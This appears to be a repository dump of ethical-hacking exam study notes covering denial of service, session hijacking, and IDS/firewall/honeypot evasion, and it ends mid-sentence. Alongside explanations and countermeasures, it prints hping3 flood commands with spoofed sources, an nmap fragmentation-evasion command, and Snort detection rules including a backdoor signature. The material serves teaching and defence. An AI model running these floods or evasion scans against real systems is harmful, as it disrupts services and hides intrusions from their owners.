├── 1-Introduction.md ├── 10-Denial-of-Service.md ├── 11-Session-Hijacking.md ├── 12-Evading-IDS-Firewalls-and-Honeypots.md ├── 13-Hacking-Web-Servers.md ├── 14-Hacking-Web-Applications.md ├── 14-Pentesting.md ├── 16-Hacking-Wireless-Networks.md ├── 17-Hacking-Mobile-Platforms-and-IoT.md ├── 19-Cloud Computing.md ├── 2-Footprinting-and-Reconnaissance.md ├── 20-Cryptography.md ├── 3-Scanning-Networks.md ├── 5-Vulnerability-Analysis.md ├── 6-System-Hacking.md ├── 7-Malware.md ├── 8-Sniffing.md ├── 9-Social-Engineering.md ├── All-Modules.html ├── All-Modules.md └── README.md /10-Denial-of-Service.md: -------------------------------------------------------------------------------- 1 | # Denial of Service 2 | 3 | > ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/9-Denial-of-Service)** 4 | 5 | ## DoS 6 | *A Denial of Service (DoS) is a type of attack on a service that disrupts its normal function and prevents other users from accessing it. The most common target for a DoS attack is an online service such as a website, though attacks can also be launched against networks, machines or even a single program.* 7 | 8 | DoS attacks can cause the following problems: 9 | - Ineffective services 10 | - Inaccessible services 11 | - Interruption of network traffic 12 | - Connection interference 13 | 14 | ## DDoS 15 | *A distributed denial of service (DDoS) attack is launched from numerous compromised devices, often distributed globally in what is referred to as a **botnet**.* 16 | 17 | ![dos](https://www.imperva.com/learn/wp-content/uploads/sites/13/2019/01/hits-per-second.png) 18 | 19 | **Goal:** 20 | - Seeks to take down a system or deny access to it by authorized users. 21 | 22 | ### **Botnet** 23 | *Network of zombie computers a hacker uses to start a distributed attack.* 24 | - Botnets can be designed to do malicious tasks including sending **spam, stealing data, ransomware, fraudulently clicking on ads or distributed denial-of-service (DDoS) attacks.** 25 | - Can be controlled over HTTP, HTTPS, IRC, or ICQ 26 | 27 | ![botnet](https://www.f5.com/content/dam/f5-labs-v2/article/articles/edu/20190605_what_is_a_ddos/DDoS_attack.png) 28 | 29 | - **Botnet Scanning Methods**: 30 | - **Random** - Randomly looks for vulnerable devices 31 | - **Hitlist** - Given a list of devices to scan for vulnerabilities 32 | - **Topological** - Scan hosts discovered by currently exploited devices 33 | - **Local subnet** - Scans local network for vulnerable devices 34 | - **Permutation** - Scan list of devices created through pseudorandom permutation algorithm 35 | 36 | 37 | 38 | ## Three Types of DoS / DDoS 39 | 40 | ### **1. Volumetric attacks** 41 | - Consumes the bandwidth of target network or service. 42 | - Send a massive amount of traffic to the target network with the goal of consuming **so much bandwidth** that users are denied access. 43 | - Bandwitdh depletion attack: Flood Attack and Amplification attack. 44 | 45 | - **Attacks**: 46 | - UDP flood attack 47 | - ICMP flood attack 48 | - Ping of Death attack 49 | - Smurf attack (IP) 50 | - Fraggle (UDP) 51 | - Malformed IP packet flood attack 52 | - Spoofed IP packet flood attack 53 | 54 | > - ⚠️ **Volumetric attacks is measured in Bits per second (Bps).** 55 | 56 | ### **2. Protocol Attacks** 57 | - Consume other types of resources like **connection state tables** present in the network infrastructure components such as **load balancers, firewalls, and application servers**. 58 | - **Attacks**: 59 | - SYN flood attack 60 | - Fragmentation attack 61 | - ACK flood attack 62 | - TCP state exhaustion attack 63 | - TCP connection flood attack 64 | - RST attack 65 | 66 | > - ⚠️ **Protocol attacks is measured in Packets per second (Pps).** 67 | 68 | ### **3. Application Layer Attacks** 69 | 70 | - Includes low-and-slow attacks, GET/POST floods, attacks that target Apache, Windows or OpenBSD vulnerabilities and more. 71 | - Consume the resources necessary for the application to run. 72 | - Target web servers, web application and specific web-based apps. 73 | - Abuse higher-layer (7) protocols like HTTP/HTTPS and SNMP. 74 | - **Attacks**: 75 | - HTTP GET/POST attack 76 | - Slowloris attack 77 | 78 | > - ⚠️ **Application layer attacks is measured in Requests per second (Rps).** 79 | 80 | > - ⚠️ **Application level attacks are against weak code.** 81 | 82 | 83 | ## Attacks explanation 84 | 85 | ### **IP Fragmentation attacks** 86 | - IP / ICMP fragmentation attack is a common form of volumetric DoS. In such an attack, datagram fragmentation mechanisms are used to overwhelm the network. 87 | 88 | - Bombard the destination with fragmented packets, causing it to use memory to reassemble all those fragments and overwhelm a targeted network. 89 | 90 | - **Can manifest in different ways:** 91 | - **UDP Flooding** - attacker sends large volumes of fragments from numerous sources. 92 | - **UDP and ICMP** fragmentation attack - only parts of the packets is sent to the target; Since the packets are fake and can't be reassembled, the server's resources are quickly consumed. 93 | - **TCP fragmentation attack** - also know as a Teardrop attack, targets TCP/IP reassembly mechanisms; Fragmented packets are prevented from being reassembled. The result is that data packets overlap and the targeted server becomes completely overwhelmed. 94 | 95 | ### **TCP state-exhaustion attack** 96 | - Attempt to consume connection state tables like: **Load balancers, firewalls and application servers.** 97 | 98 | ### **Slowloris attack** 99 | *Is an application layer attack which operates by utilizing partial HTTP requests. The attack functions by opening connections to a targeted Web server and then keeping those connections open as long as it can.* 100 | 101 | - ![slowloris](https://www.cloudflare.com/img/learning/ddos/ddos-slowloris-attack/slowloris-attack-diagram.png) 102 | 103 | - The attacker first opens multiple connections to the targeted server by sending multiple partial HTTP request headers. 104 | - The target opens a thread for each incoming request 105 | - To prevent the target from timing out the connections, the attacker periodically sends partial request headers to the target in order to keep the request alive. In essence saying, “I’m still here! I’m just slow, please wait for me.” 106 | - The targeted server is never able to release any of the open partial connections while waiting for the termination of the request. 107 | - Once all available threads are in use, the server will be unable to respond to additional requests made from regular traffic, resulting in denial-of-service. 108 | 109 | ### **SYN attack** 110 | - Sends thousands of SYN packets 111 | - Uses a **false source address** / spoofed IP address. 112 | - The server then responds to each one of the connection requests and leaves an open port ready to receive the response. 113 | - Eventually engages all resources and exhausts the machine 114 | 115 | ### **SYN flood (half-open attack)** 116 | - Sends thousands of SYN packets 117 | - While the **server waits for the final ACK packet**, **which never arrives**, the attacker continues to send more SYN packets. The arrival of each new SYN packet causes the server to temporarily maintain a new open port connection for a certain length of time, and once all the available ports have been utilized the server is unable to function normally. 118 | - Eventually bogs down the computer, runs out of resources. 119 | 120 | - ![syn-flood](https://www.cloudflare.com/img/learning/ddos/syn-flood-ddos-attack/syn-flood-attack-ddos-attack-diagram-2.png) 121 | 122 | ### **ICMP flood** 123 | - Sends ICMP Echo packets with a spoofed address; eventually reaches limit of packets per second sent 124 | - Is possible to use `hping3` to perform ICMP flood: 125 | - `hping -1 --flood --rand-source ` 126 | 127 | ### **Smurf attack** 128 | - The Smurf attack is a **distributed denial-of-service** attack in which large numbers of ICMP packets with the intended victim's **spoofed source IP are broadcast to a computer network using an IP broadcast address.** 129 | - Is possible to use `hping3` to perform this attack and bash script to loop through the subnet. 130 | - `hping3 -1 -c 1000 10.0.0.$i --fast -a ` 131 | - ![smurf](https://www.imperva.com/learn/wp-content/uploads/sites/13/2019/01/smurf-attack-ddos.png) 132 | 133 | ### **Fraggle** 134 | - Same concept as Smurf attack but with **UDP packets** (UDP flood attack). 135 | - Is possible to use `hping3` to perform Fraggle attack/ UDP flood 136 | - `hping3 --flood --rand-source --udp -p ` 137 | 138 | ### **Ping of Death** 139 | - Fragments ICMP messages; after reassembled, the ICMP packet is larger than the maximum size and crashes the system 140 | - Performs by sending an IP packet larger than the 65,536 bytes allowed by the IP protocol. 141 | - Old technique that can be acceptable to old systems. 142 | 143 | ### **Teardrop** 144 | - Overlaps a large number of garbled IP fragments with oversized payloads; causes older systems to crash due to fragment reassembly 145 | 146 | ### **Peer to peer** 147 | - Clients of peer-to-peer file-sharing hub are disconnected and directed to connect to the target system 148 | 149 | ### **Multi-vector attack** 150 | - Is a combination of **Volumetric, protocol, and application-layer attacks**. 151 | 152 | ### **Phlashing / Permanent DoS** 153 | - A DoS attack that causes permanent damage to a system. 154 | - Modifies the firmware and can also cause a **system to brick**. 155 | - *e.g: Send fraudulent hardware update to victim; crashing BIOS.* 156 | 157 | ### **LAND attack** 158 | - Sends a SYN packet to the target with a spoofed IP the same as the target; if vulnerable, target loops endlessly and crashes 159 | 160 | 161 | ## DoS/DDoS Attack Tools: 162 | - **Low Orbit Ion Cannon** (LOIC) - DDoS tool that floods a target with TCP, UDP or HTTP requests 163 | - ![loic](https://i.ytimg.com/vi/HavEPVxUn-A/maxresdefault.jpg) 164 | 165 | - **High Orbit Ion Cannon** (HOIC) - More powerful version of LOIC; Targets TCP and UDP; The application can open up to 256 simultaneous attack sessions at once, bringing down a target system by sending a continuous stream of junk traffic until legitimate requests are no longer able to be processed; 166 | - ![hoic](https://upload.wikimedia.org/wikipedia/commons/d/d8/HOIC_INTERFACE.png) 167 | 168 | - **Other Tools** 169 | - HULK 170 | - Metasploit 171 | - Nmap 172 | - Tsunami 173 | - Trinity - Linux based DDoS tool 174 | - Tribe Flood Network - uses voluntary botnet systems to launch massive flood attacks 175 | - RUDY (R-U-Dead-Yet?) - DoS with HTTP POST via long-form field submissions 176 | 177 | ## Mitigations 178 | - Traffic analysis 179 | - Filtering 180 | - Firewalls 181 | - ACLs 182 | - Reverse Proxies 183 | - Rate limiting - limiting the maximum number of connections a single IP address is allowed to make) 184 | - Load balancers 185 | - DoS prevention software 186 | -------------------------------------------------------------------------------- /11-Session-Hijacking.md: -------------------------------------------------------------------------------- 1 | # Session Hijacking 2 | 3 | > ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/10-Session-Hijacking)** 4 | 5 | *The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.* [[+]](https://owasp.org/www-community/attacks/Session_hijacking_attack) 6 | 7 | - HTTP communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. 8 | - The most useful method depends on a **token** that the Web Server sends to the client browser after a successful client authentication. 9 | - A **session token** is normally composed of a string of variable width and it could be used in different ways 10 | - like in the URL, in the header of the HTTP requisition as a cookie, in other parts of the header of the HTTP request, or yet in the body of the HTTP requisition. 11 | 12 | **The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.** 13 | 14 |

15 | 16 |

17 |

18 | Session Hijacking using XSS 19 |

20 | 21 | ## **The session token could be compromised in different ways; the most common are:** 22 | 23 | ### **Predictable session token** 24 | - The session ID information for a certain application is normally composed by a string of fixed width. **Randomness is very important** to avoid its prediction. 25 | - **Example:** Session ID value is “user01”, which corresponds to the username. By trying new values for it, like “user02”, it could be possible to get inside the application without prior authentication. 26 | 27 | ### **Session Sniffing** 28 | - Sniffing can be used to hijack a session when there is non-encrypted communication between the web server and the user, and the session ID is being sent in plain text. 29 | - **Wireshark** and **Kismet** can be used to capture sensitive data packets such as the session ID from the network. 30 | 31 | ### **Cross-site scripting (XSS)** 32 | - A server can be vulnerable to a cross-site scripting exploit, which enables an attacker to execute malicious code from the user’s side, gathering session information. An attacker can target a victim’s browser and send a scripted JavaScript link, which upon opening by the user, runs the malicious code in the browser hijacking sessions. 33 | 34 | ### **CSRF - Cross-Site Request Forgery** 35 | - Forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing; 36 | - CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. 37 | 38 | - **CSRF Scenario:** 39 | 1. Visit your bank's site, log in. 40 | 2. Then visit the attacker's site (e.g. sponsored ad from an untrusted organization). 41 | 3. Attacker's page includes form with same fields as the bank's "Transfer Funds" form. 42 | 4. Form fields are pre-filled to transfer money from your account to attacker's account. 43 | 5. Attacker's page includes Javascript that submits form to your bank. 44 | 6. When form gets submitted, browser includes your cookies for the bank site, including the session token. 45 | 7. Bank transfers money to attacker's account. 46 | 8. The form can be in an iframe that is invisible, so you never know the attack occurred. 47 | 48 | ### **Session Fixation** 49 | - Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. 50 | 51 | - **Session fixation Scenario**: 52 | 1. The attacker accesses the web application login page and **receives a session ID** generated by the web application. 53 | 2. The attacker uses an additional technique such as **CRLF Injection, man-in-the-middle attack, social engineering,** etc., and gets the victim to use the **provided session identifier**. 54 | 3. The victim accesses the web application login page and logs in to the application. After authenticating, the **web application treats anyone who uses this session ID as if they were this user.** 55 | 4. The attacker uses the session ID to access the web application, **take over the user session, and impersonate the victim**. 56 | 57 | ### **Man-in-the-browser attack** 58 | - The Man-in-the-Browser attack is the same approach as Man-in-the-middle attack, but in this case a Trojan Horse is used to intercept and manipulate calls between the main application’s executable. 59 | 60 | ### **Man-in-the-middle attack** 61 | - MITM attack is a general term for when a perpetrator positions himself in a conversation between a user and an application—either to eavesdrop or to impersonate one of the parties, making it appear as if a normal exchange of information is underway. 62 | 63 | 64 | ## Other attacks 65 | - **Compression Ratio Info-leak Made Easy (CRIME)**: 66 | - Is a security exploit against secret web cookies over connections using the HTTPS and SPDY protocols that also use data compression. When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking. 67 | - **BREACH**: 68 | - Is a security exploit against HTTPS when using HTTP compression (SSL/TLS compression). BREACH is built based on the CRIME security exploit. 69 | 70 | > ⚠️ **SPDY protocol manipulates HTTP traffic, with particular goals of reducing web page load latency and improving web security.** 71 | 72 | - **Forbideen Attack** 73 | Vulnerability in TLS that incorrectly reuse the **same cryptographic nonce when data is encrypted**. TLS specifications are clear that these arbitrary pieces of data should be used only once. When the same one is used more than once, it provides an opportunity to carry out the forbidden attack. 74 | 75 | ## Network Layer Attacks 76 | - **TCP Hijacking**: TCP/IP Hijacking is when an authorized user gains access to a genuine network connection of another user. It is done in order to bypass the password authentication which is normally the start of a session. 77 | - e.g: TELNET Hijacking using Ettercap, Shijack, making a blind hijacking. 78 | 79 | ### **Tools** 80 | - **Ettercap** - MiTM tool and packet sniffer on steroids 81 | - **Hunt** - sniff, hijack and reset connections 82 | - **T-Sight** - easily hijack sessions and monitor network connections 83 | - **Zaproxy** 84 | - **Burp Suite** 85 | - **Paros** 86 | - **Shijack** - TCP/IP hijack tools 87 | - **Juggernaut** 88 | - **Hamster** 89 | - **Ferret** 90 | 91 | ## Countermeasures 92 | * **Session IDS** 93 | - Using unpredictable (randomized) Session IDs 94 | - Never use URL's with Sessions IDs 95 | - Don't Re-use Session IDs 96 | - Use **HTTP-Only on Cookies** preventing XSS (Cross-Site Scripting) 97 | - Don't use HTTP protocol without encryption --> Use TLS/SSL [HTTPS] 98 | - Limiting incoming connections 99 | - Minimizing remote access 100 | - Regenerating the session key after authentication 101 | - Time - absolute / inactive *(e.g: 1h of inactivity the user will automatically log off)* 102 | - Use **MFA** 103 | - Use **IPSec to encrypt** 104 | 105 | ### IPSec 106 | - **Transport Mode** - payload and ESP trailer are encrypted; IP header is not 107 | - **Tunnel mode** - everything is encrypted; cannot be used with NAT 108 | - **Architecture Protocols** 109 | - **Authentication Header** - guarantees the integrity and authentication of IP packet sender 110 | - **Encapsulating Security Payload** (ESP) - provides origin authenticity and integrity as well as confidentiality 111 | - **Internet Key Exchange** (IKE) - produces the keys for the encryption process 112 | - **Oakley** - uses Diffie-Hellman to create master and session keys 113 | - **Internet Security Association Key Management Protocol** (ISAKMP) - software that facilitates encrypted communication between two endpoints 114 | -------------------------------------------------------------------------------- /12-Evading-IDS-Firewalls-and-Honeypots.md: -------------------------------------------------------------------------------- 1 | # Evading IDS, Firewalls and Honeypots 2 | 3 | ## IDS/IPS - Basic Concepts 4 | 5 | **Intrusion Prevention System (IPS)** - ACTIVE monitoring of activity looking for anomalies and alerting/notifiying AND **taking action when they are found**. 6 | 7 | **Intrusion Detection System (IDS)** - PASSIVE monitoring of activity looking for anomalies and alerting/notifying when they are found. 8 | 9 |

10 | 11 |

12 | 13 | ### **Deployment Types - HIDS & NIDS & WIDS:** 14 | 1. **Host based** - Monitors activity on a single device/host by being installed lcoally. 15 | 16 | 2. **Network based** - Monitors activity across a network using remote sensors that reprot back to a central system. Often paired with a security Information & SIEM system for analysis. Often Reverse ARP or Reverse DNS lookups are used to discover the source 17 | 18 | ### **Knowledge & Behavior-Based Detection:** 19 | 1. **Knowledge Based (Signature Based | Pattern Matching)** - Most common form of detection. Uses a database of profiles, or signatures to assess all traffic against. 20 | 21 | 2. **Behavior Based (Statistical | Anomaly | Heuristic)** - Starts by creating a baseline of behavior for the monitored system/network and then comapres all traffic against that looking for deviations. Can be labeled an AI or Expert system. 22 | 23 | --- 24 | ### **Types of IDS Alerts** 25 | - **True Positive** --> Attack - Alert ✅✅ 26 | - **False Positive** --> No Attack - Alert ❌✅ 27 | - **False Negative** --> Attack - No Alert ✅❌ 28 | - *This is the worst scenario* 29 | - **True Negative** --> No Attack - No Alert ❌❌ 30 | 31 | --- 32 | 33 | ## Firewalls - Basic Concepts 34 | *Firewalls are often seen as NAC devices. Use of rule sets to filter traffic can implement security policy.* 35 | 36 | ### **Firewalls types:** 37 | - **Stateful (Dynamic Packet Filtering)** - Layer 3 + 4 (Network + Transport layer) 38 | - **Stateless (Static Packet Filtering)** - Layer 3 (Network) 39 | - **Deep Packet Inspection** - Layer 7 (Application Layer) 40 | - **Proxy Firewall** - Mediates communications between unstrusted and trusted end-points (server/hosts/clients). A proxy firewall is a network security system that protects network resources by filtering messages at the Application Layer 7. A proxy firewall may also be called an application firewall or gateway firewall. 41 | 42 | ### **Proxy Types:** 43 | - **Circuit-level proxy** - Firewall that works on **Layer 5 (Session layer)**; They monitor TCP handshaking between packets to determine whether a requested session is legitimate. 44 | - **Application-level proxy** - Any service or server that acts as a proxy for client computer requests at the application’s protocols. 45 | 46 | > **⚠️ An application-level proxy is one that knows about the particular application it is providing proxy services for; it understands and interprets the commands in the application protocol. A circuit-level proxy is one that creates a circuit between the client and the server without interpreting the application protocol.** 47 | 48 | - **Multi-homed Firewall (dual-homed)** - Firewall that has two or more interfaces; One interface is connected to the untrusted network and another interface is connected to the trusted network. A DMZ can be added to a multi-homed firewall just by adding a third interface. 49 | 50 | - **Bastion hosts** - Endpoint that is exposed to the internet but has been hardened to withstand attacks; Hosts on the screened subnet designed to protect internal resources. 51 | 52 | - **Screened host** - Endpoint that is protected by a firewall. 53 | 54 | - **Packet-filtering** - Firewalls that only looked at headers 55 | 56 | 57 | > ⚠️ Only uses rules that **implicitly denies** traffic unless it is allowed. 58 | 59 | > ⚠️ Oftentimes uses **network address translation** (NAT) which can apply a one-to-one or one-to-many relationship between external and internal IP addresses. 60 | 61 | > ⚠️ **Private zone** - hosts internal hosts that only respond to requests from within that zone 62 | 63 | 64 | ## Honeypots 🍯 65 | *Honeypots are decoy systems or servers deployed alongside production systems within your network. When deployed as enticing targets for attackers, honeypots can add security monitoring opportunities for blue teams and misdirect the adversary from their true target.* 66 | 67 | - **Honeynet** - Two or more honeypots on a network form a honeynet. Honeynets and honeypots are usually implemented as parts of larger Network Intrusion Detection Systems. 68 | 69 | - A **Honeyfarm** is a centralized collection of honeypots and analysis tools. 70 | 71 | ### **Types of Honeypots:** 72 | 1. **Low-interaction** ---> Simulates/imitate services and systems that frequently attract criminal attention. They offer a method for collecting data from blind attacks such as botnets and worms malware. 73 | 2. **High interaction** ---> Simulates all services and applications and is designed to be completely compromised 74 | 3. **Production** ---> Serve as decoy systems inside fully operating networks and servers, often as part of an intrusion detection system (IDS). They deflect criminal attention from the real system while analyzing malicious activity to help mitigate vulnerabilities. 75 | 4. **Research** ---> Used for educational purposes and security enhancement. They contain trackable data that you can trace when stolen to analyze the attack. 76 | 77 | - **Honeypot Tools:** 78 | - Specter 79 | - Honeyd 80 | - KFSensor (Honeypot IDS) 81 | 82 | ## Evading with Nmap 83 | 84 | ### **Useful switches for Evading and Stealthy**: 85 | 86 | Nmap Switch | Information 87 | --|-- 88 | `-v` | Verbose level 89 | `-sS` | TCP SYN scan 90 | `-T` | Time template for performing the scan 91 | `-f` | Use fragmented IP packets 92 | `-f --mtu` | Use fragmented packets & set MTU 93 | `-D`| IP address Decoy: : Cloak a scan with decoys 94 | `-S` | Spoof the source IP address 95 | `--send-eth` | Ensures that we use Ethernet level packets. bypassing the IP layer and sends raw Ethernet frames within the flow 96 | `--data-length` | Specify the length of data/frame 97 | `--source-port` | Specify a randomized port that you want to comunicate 98 | 99 | --- 100 | ### **Example:** 101 | 102 | • Sends IPv4 fragmented 50-byte packet size; The packets are too small to send data and to detect as a Probe/Scanning technique: 103 | 104 | `nmap -v -sS -f -mtu 32 --send-eth --data-length 50 --source-port 8965 -T5 192.168.0.22` 105 | 106 | > ⚠️ **Fragmentation is the heart of the IDS/Firewall Evasion techniques.** 107 | --- 108 | 109 | ## Using SNORT 110 | *SNORT is an open source network intrusion detection system (NIDS). Snort is a packet sniffer that monitors network traffic in real time, scrutinizing each packet closely to detect a dangerous payload or suspicious anomalies.* 111 | 112 | - Snort is a widely deployed IDS that is open source 113 | - Includes a **sniffer**, **traffic logger** and a **protocol analyzer** 114 | - Runs in three different modes 115 | - **Sniffer** - Watches packets in real time 116 | - **Packet logger** - Saves packets to disk for review at a later time 117 | - **NIDS** - Analyzes network traffic against various rule sets 118 | - Configuration is in `/etc/snort` on Linux and `C:\snort\etc` in Windows; the file is **snort.conf**. 119 | 120 | ### **SNORT basics commands:** 121 | 122 | **Operational modes:** 123 | - Snort as **Sniffer** ---> `snort -v` 124 | 125 | - Snort as **Packet logger** ---> `snort -l` 126 | 127 | - Snort as **NIDS** ---> `snort -A` or `snort -c ` 128 | 129 | **Example of usage**: 130 | 131 | - **`snort -i 4 -l c:\Snort\log -c c:\Snort\etc\snort.conf -T`** 132 | - *This command will test snort configuration and rules and check if there is any erros without starting up.* 133 | - `-i 4` ---> interface specifier, in case is interface 4. 134 | - `-l` ---> for logging 135 | - `-c` ---> use Snort rules file specifying path 136 | - `-T` ---> Only For testing, this prevent Snort from start up; Essentially to check if there is any errors and if the rules are good. 137 | 138 | - **`snort -i 4 -c c:\Snort\etc\snort.conf -l c:\Snort\log -K ascii`** 139 | - *This command will fire up Snort NIDS and log everything in ASCII.* 140 | 141 | **Basic commands**: 142 | Flag | Information 143 | -|- 144 | `-A` | Set alert mode: fast, full, console, test or none 145 | `-b` | Log packets in tcpdump format (much faster!) 146 | `-B ` | Obfuscate IP addresses in alerts and packet dumps using CIDR mask 147 | `-c ` | Use Rules file 148 | `-C` | Print out payloads with character data only (no hex) 149 | `-l` | Specifies the logging directory (all alerts and packet logs are placed in this directory) 150 | `-i ` | Specifies which interface Snort should listen on 151 | `-K` | Logging mode (pcap[default], ascii, none) 152 | `-?` | Lists all switches and options and then exits 153 | 154 | ### **SNORT Rules** 155 | *SNORT has a rules engine that allows for customization of monitoring and detection capabilities.* 156 | 157 | - **There are three available rule actions** 158 | 1. Alert 159 | 2. Pass 160 | 3. Log 161 | - **And three available IP protocols:** 162 | 1. TCP 163 | 2. UDP 164 | 3. ICMP 165 | 166 | ### **Breaking down a Snort rule:** 167 | 168 | > **`alert icmp any any -> &HOME_NET any (msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)`** 169 | 170 | Rule part | Information 171 | -|- 172 | `alert icmp any any -> $HOME_NET any` | **Rule Header** ⬇️ 173 | `alert` | Rule action. Snort will generate an alerta when the set condition is met. 174 | `any` (1st) | Source IP. Snort will look at all sources 175 | `any` (2nd) | Source port. Snort will look at all ports 176 | `->` | Direction. From source to destination; *(source -> destination)* 177 | `&HOME_NET` | Destination IP. We are using the HOME_NET value from the snort.conf file which means a variable that defines the network or networks you are trying to protect. 178 | `any` (3rd) | Destination port. Snort will look at all ports on the protected network 179 | `(msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)` | **Rule Options** ⬇️ 180 | `msg:"ICMP test"` | Snort will include this message with the alert 181 | `sid:1000001` | Snort rule ID. Remember all numbers < 1,000,000 are reserved, this is why we are starting with 1000001 (you may use any number, as long as it's grater that 1,000,000) 182 | `rev:1` | Revision number. This option allows for easier rule maintenance 183 | `classtype:icmp-event` | Categorizes the rule as an "icmp-event", one of the predefined Snort categories. This options helps with the rule organization 184 | --- 185 | ### Rules Examples: 186 | > **`alert tcp 192.168.x.x any -> &HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002; rev:1;)`** 187 | - TCP alert in a source IP address 192.168.x.x with any port; HOME_NET destination on port 21. 188 | 189 | > **`alert tcp $HOME_NET 21 -> any any (msg:"FTP failed login"; content:"Login or password incorrent"; sid:1000003; rev:1;)`** 190 | - TCP alert in HOME_NET port 21 (FTP) as a source, to any destination IP address and port. 191 | 192 | > **`alert tcp !HOME_NET any -> $HOME_NET 31337 (msg : "BACKDOOR ATTEMPT-BackOrifice")`** 193 | - This alerts about traffic coming not from an external network to the internal one on port 31337. 194 | 195 | **Example output** 196 | - 10/19-14:48:38.543734 0:48:542:2A:67 -> 0:10:B5:3C:34:C4 type:0x800 len:0x5EA 197 | - **xxx -> xxx TCP TTL:64 TOS:0x0 ID:18112 IpLen:20 DgmLen:1500 DF** 198 | - Important info is bolded 199 | 200 | ## Evasion Concepts and Techniques 201 | 202 | - **Insertion Attack** - Attacker forces the IDS to process invalid packets. 203 | 204 | - **Evasion** - An endpoint accepts a packet that the IDS would normally reject. Typically executed via **fragmentation** of the attack packets to allow them to be moved through the IDS. 205 | 206 | - **Obfuscation** - Encoding the attack packets in such a way that the target is able to decode them, but the IDS is not. 207 | - Unicode 208 | - Polymorphic code 209 | - Encryption 210 | - Path manipulation to cause signature mismatch 211 | 212 | - **False Positive Generation Events** - Crafting malicious packets designed to set off alarms with hope of distracting/overwhelming IDS and operators. 213 | 214 | - **Session Splicing** - Just another type of fragmentation attack. 215 | 216 | - **Unicode encoding** - works with web requests - using Unicode characters instead of ascii can sometimes get past 217 | 218 | - **Fragmentation attack** - Splits up packets so that the IDS can't detect the real intent 219 | 220 | - **Overlapping Fragments** - Generate a bunch of tiny fragments overlapping TCP sequence numbers. 221 | 222 | - **Time-To-Live (TTL) Attack** - Requires the attacker to have inside knowledge of the target network to allow for the adjusment of the TTL values to control who gets what packets when. 223 | 224 | - **Invalid RST Packets** - Manipulation of the RST flag to trick IDS into ignoring the communication session with the target. 225 | 226 | - **Urgency Flag - URG** - Manipulation URG flag to cause the target and IDS to have different sets of packets, because the IDS processes ALL packets irrespective of the URG flag, whereas the target will only process URG traffic. 227 | 228 | - **Polymorphic Shellcode** - Blow up the pattern matching by constantly changing. 229 | 230 | - **ASCII Shellcode** - Use ASCII characters to bypass pattern matching. 231 | 232 | - **Application-Level Attacks** - Taking advantage of the compression used to transfer large files and hide attacks in compressed data, as it cannot be examined by the IDS. 233 | 234 | - **Desynchronization** - Manipulation the TCP SYN to fool IDS into not paying attention to the sequence numbers of the illegitimate attack traffic, but rather, give it a false set of sequences to follow. 235 | 236 | - **Encryption** - Using encryption to hide attack. 237 | 238 | - **Flood the network** - Trigger alerts that aren't your intended attack so that you confuse firewalls/IDS and network admins; Overwhelming the IDS. 239 | 240 | > ⚠️ **Slow down** - Faster scanning such as using nmap's -T5 switch will get you caught. Pros use -T1 switch to get better results 241 | 242 | **Tools for Evasion** 243 | - **Nessus** - Also a vulnerability scanner 244 | - **ADMmutate** - Creates scripts not recognizable by signature files 245 | - **NIDSbench** - Older tool for fragmenting bits 246 | - **Inundator** - Flooding tool 247 | 248 | ## Firewall Evasion 249 | - **Firewalking** - Using TTL values to determine gateway ACL filters and allow for mapping of internal networks by analyzing IP packet responses; Going through every port on a firewall to determine what is open. 250 | 251 | - **Banner Grabbing** - Looking for FTP, TELNET and web server banners. 252 | 253 | - **IP Address Spoofing** - Hijacking technique allowing attacker to masquerade as a trusted host. 254 | 255 | - **Source Routing** - Allows the sender of a packet to partially or fully specify the route to be used. 256 | 257 | - **Tiny Fragments** - Sucessful with Firewalls when they ONLY CHECK for the TCP header info, allowing the fragmentation of the information across multiple packets to hide the true intention of the attack. 258 | 259 | - **ICMP Tunneling** - Allows for the tunneling of a backdoor shell via the ICMP echo packets because the RFC (792) does not clearly define what kind of data goes in the data portion of the frame, allowing for attack traffic to be seen as acceptable when inserted. If firewalls do not examine the payload section of the dataframe, they would let the data through, allowing the attack. 260 | 261 | - **ACK Tunneling** - Use of the ACK flag to trick firewall into allowing packets, as many firewalls do not check ACK packets. 262 | 263 | - **HTTP Tunneling** - Use of HTTP traffic to 'hide' attacks. 264 | 265 | - **SSH Tunneling** - Use of SSH to encrypt and send attack traffic. 266 | 267 | - **MitM Attacks** - Use of DNS and routing manipulation to bypass firewalls. 268 | 269 | - **XSS Attacks** - Allows for the exploitation of vulnerabilities around the processing of input parameters from the end user and the server responses in a web application. The attacker injects malicious HTML/JS code into website to force the bypassing of the firewall once executed. 270 | 271 | - *Use IP in place of a URL - may work depending on nature of filtering in place* 272 | - *Use Proxy Servers/Anonymizers - May work depending on nature of filtering in place* 273 | - *ICMP Type 3 Code 13 will show that traffic is being blocked by firewall* 274 | - *ICMP Type 3 Code 3 tells you the client itself has the port closed* 275 | 276 | - **Tools** 277 | - CovertTCP 278 | - ICMP Shell 279 | - 007 Shell 280 | - The best way around a firewall will always be a compromised internal machine 281 | 282 | ## How to detect a Honeypot 283 | *Probe services running on them; Ports that show a service is available, but **deny a three-way handshake may indicate that the system is a honeypot***. 284 | 285 | * **Layer 7 (Application)** - Examine latency of responses from server 286 | * **Layer 4 (Transport)** - Examine the TCP windows size, looing for continuous Acknowledgement of incoming packets even when the windows size is set to 0. 287 | * **Layer 2 (Data Link)** - If you are on the same network as the honeypot, **look for MAC addresses** in packets that indicate the presence of a **'Black Hole'** (`0:0:f:ff:ff:ff`) 288 | 289 | > ⚠️ **The exam will not cover every information presented, but is good to have a general idea.** 290 | 291 | * If Honeypot is virtualized, look for the vendor assigned MAC address ranges as published by IEEE. 292 | * If Honeypot is the **Honeyd** type, use time based TCP fingerprinting methods to detect 293 | * Detecting **User-Mode Linux (UML) honeypot**, analyze 